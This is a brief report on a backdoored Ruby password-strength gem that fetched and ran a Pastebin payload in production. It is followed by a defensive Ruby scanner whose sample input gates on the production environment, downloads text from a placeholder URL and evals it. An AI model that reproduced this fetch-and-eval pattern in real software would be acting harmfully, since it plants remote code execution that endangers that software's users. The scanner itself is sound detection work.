Ruby Gem Repository Hack

A diligent developer’s security practices have uncovered a dangerous backdoor in a popular Ruby library. The library was intended for checking the strength of user-chosen passwords.

The malicious code would check whether the library was being used in a test or production environment. When in production, it would download a second payload from Pastebin.com, a text hosting portal, and run it.
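The combination described above (an environment check, a remote fetch, and execution of the fetched text) can be flagged when reviewing a gem update. The following is an added example, not code from the affected library; the rule names, sample sources and placeholder URL are constructed for illustration.

```ruby
# Added example: triage heuristic for the pattern described above.
# Rule names, sample sources and the placeholder URL are constructed.
RULES = {
  env_gate:     /\b(?:Rails\.env|ENV\[['"](?:RAILS_ENV|RACK_ENV)['"]\])/,
  remote_fetch: /\b(?:Net::HTTP|URI\.open|URI\.parse|open-uri)\b/,
  dynamic_exec: /\b(?:instance_|class_|module_)?eval\b/
}.freeze

# Return { rule_name => [line numbers] } for every rule that matched.
def scan_source(source)
  hits = {}
  source.each_line.with_index(1) do |line, lineno|
    next if line.lstrip.start_with?("#") # skip full-line comments
    RULES.each { |name, re| (hits[name] ||= []) << lineno if line.match?(re) }
  end
  hits
end

# Fetch + dynamic execution is worth a manual read; add an environment
# gate (code that stays quiet in test runs) and it becomes high priority.
def verdict(hits)
  return :clean unless hits.key?(:remote_fetch) && hits.key?(:dynamic_exec)
  hits.key?(:env_gate) ? :high : :review
end

SUSPICIOUS = <<~'RUBY'
  require 'net/http'
  if Rails.env.production?
    body = Net::HTTP.get(URI.parse("https://paste.example.invalid/raw/PLACEHOLDER"))
    eval(body)
  end
RUBY

BENIGN = <<~'RUBY'
  # eval is never used here
  def strong?(password)
    password.length >= 12 && password.match?(/\d/)
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  { "suspicious" => SUSPICIOUS, "benign" => BENIGN }.each do |name, src|
    hits = scan_source(src)
    puts "#{name}: #{verdict(hits)} #{hits}"
  end
end
```

This is a triage heuristic: obfuscated code will not match, so a hit means the file needs a manual read, and the absence of a hit proves nothing.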
